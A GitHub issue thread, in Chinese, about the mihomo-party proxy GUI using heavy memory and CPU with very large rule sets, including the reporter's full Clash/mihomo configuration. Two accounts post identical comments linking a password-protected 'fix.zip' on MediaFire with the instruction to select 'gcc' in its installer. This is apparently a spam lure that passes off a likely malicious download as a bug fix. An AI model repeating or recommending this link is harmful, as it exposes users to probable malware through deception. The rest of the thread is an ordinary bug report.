### ISSUE TITLE
[Bug] 大量规则下内存及CPU占用较高，界面操作卡顿

### ISSUE THREAD

**Issue by somnifex** [pompurin404/mihomo-party#87]
### Verify steps

- [X] 我已在标题简短的描述了我所遇到的问题
- [X] 我未在[Issue Tracker](./?q=is%3Aissue)中找到我要提出的问题
- [X] 我未在[常见问题](https://mihomo.party/guides/issue/general/)中找到我要提出的问题
- [X] 这是GUI程序的问题,而不是内核程序的问题
- [X] 我已经使用最新的测试版本测试过，问题依旧存在

### 操作系统

Windows

### 系统版本

windows11 23H2

### 发生问题 mihomo-party 版本

1.0.7及之前

### 描述

界面卡顿，查看资源管理器内存占用巨大，相同配置应用于clash verge rev内存占用正常
![image](https://github.com/user-attachments/assets/37f0bec7-ad87-4247-a3db-32bcbaab11de)

### 重现方式

打开软件即可复现

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by utopeadia** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Whats this

**Comment by ghost** [comment]
tg私聊发我出现问题的订阅

**Comment by somnifex** [comment]
> tg私聊发我出现问题的订阅

主要是这两个规则，规模在20万以上：
https://github.com/blackmatrix7/ios_rule_script/tree/master/rule/Clash/ChinaMax
https://github.com/blackmatrix7/ios_rule_script/tree/master/rule/Clash/Advertising
使用subconverter进行转换，clash配置base使用：
```
port: 7890
socks-port: 7891
redir-port: 7892
mixed-port: 7893
tproxy-port: 7894
allow-lan: false
bind-address: '*'
ipv6: true
external-controller: 127.0.0.1:9090
mode: rule
log-level: info
profile:
  store-selected: true
  store-fake-ip: true
tcp-concurrent: true
unified-delay: true
global-client-fingerprint: chrome
global-ua: mihomo
geo-auto-update: true
geodata-mode: false
geo-update-interval: 12
geox-url:
  geoip: 'https://testingcf.jsdelivr.net/gh/Loyalsoldier/v2ray-rules-dat@release/geoip.dat'
  geosite: 'https://testingcf.jsdelivr.net/gh/Loyalsoldier/v2ray-rules-dat@release/geosite.dat'
  mmdb: 'https://testingcf.jsdelivr.net/gh/Hackl0us/GeoIP2-CN@release/Country.mmdb'
dns:
  enable: true
  prefer-h3: false
  use-hosts: true
  use-system-hosts: true
  respect-rules: true
  listen: 0.0.0.0:1053
  ipv6: true
  proxy-server-nameserver:
    - https://dns.alidns.com/dns-query
    - https://doh.pub/dns-query
  default-nameserver:
    - 223.5.5.5
    - 119.29.29.29
    - system
  nameserver:
    - https://doh.pub/dns-query
    - https://dns.alidns.com/dns-query
  fallback:
    - https://8.8.8.8/dns-query
    - https://1.1.1.1/dns-query
    - https://doh.opendns.com/dns-query
    - https://dns.quad9.net/dns-query
  fallback-filter:
    geoip: false
    geoip-code: CN
    ipcidr:
      - 240.0.0.0/4
    geosite:
      - gfw
    domain:
      - '+.ai.com'
      - '+.algolia.net'
      - '+.anthropic.com'
      - '+.argotunnel.com'
      - '+.arkoselabs.com'
      - '+.auth0.com'
      - '+.azure.com'
      - '+.azureedge.net'
      - '+.bing.com'
      - '+.bingapis.com'
      - '+.bugsnag.com'
      - '+.chatgpt.com'
      - '+.claude.ai'
      - '+.cloudflare.net'
      - '+.cloudflareinsights.com'
      - '+.cohere.ai'
      - '+.docker.com'
      - '+.docker.io'
      - '+.facebook.com'
      - '+.github.com'
      - '+.githubusercontent.com'
      - '+.google'
      - '+.google.com'
      - '+.google.dev'
      - '+.googleapis.cn'
      - '+.googlevideo.com'
      - '+.identrust.com'
      - '+.instagram.com'
      - '+.intercom.io'
      - '+.live.com'
      - '+.livekit.cloud'
      - '+.meta.ai'
      - '+.microsoft.com'
      - '+.microsoftapp.net'
      - '+.minecraft.net'
      - '+.msn.com'
      - '+.openai.com'
      - '+.poe.com'
      - '+.segment.com'
      - '+.segment.io'
      - '+.sentry.io'
      - '+.synn.cc'
      - '+.stripe.com'
      - '+.t.me'
      - '+.tailscale.com'
      - '+.tailscale.io'
      - '+.twitter.com'
      - '+.usefathom.com'
      - '+.v2ex.com'
      - '+.windows.net'
      - '+.wootric.com'
      - '+.x.com'
      - '+.xn--ngstr-lra8j.com'
      - '+.youtube.com'
  sniffer:
    enable: true
    force-dns-mapping: true
    parse-pure-ip: true
    override-destination: false
    sniff:
      HTTP:
        ports: [80, 8080-8880]
        override-destination: true
      TLS:
        ports: [443, 8443]
      QUIC:
        ports: [443, 8443]
    force-domain:
      - +.v2ex.com
      - +.google.com
    skip-domain:
      - Mijia Cloud
      - dlg.io.mi.com
      - +.apple.com
tun:
  enable: true
  stack: mixed
  auto-route: true
  auto-redirect: true
  auto-detect-interface: true
  dns-hijack:
    - any:53
    - tcp://any:53
  mtu: 1500
  strict-route: true
  include-package:
    - com.android.chrome
  exclude-package:
    - com.android.captiveportallogin
    
proxy-groups:
- name: "direct"
  proxies:
  - DIRECT
  lazy: false
  timeout: 5000
  max-failed-times: 5
  disable-udp: false
```
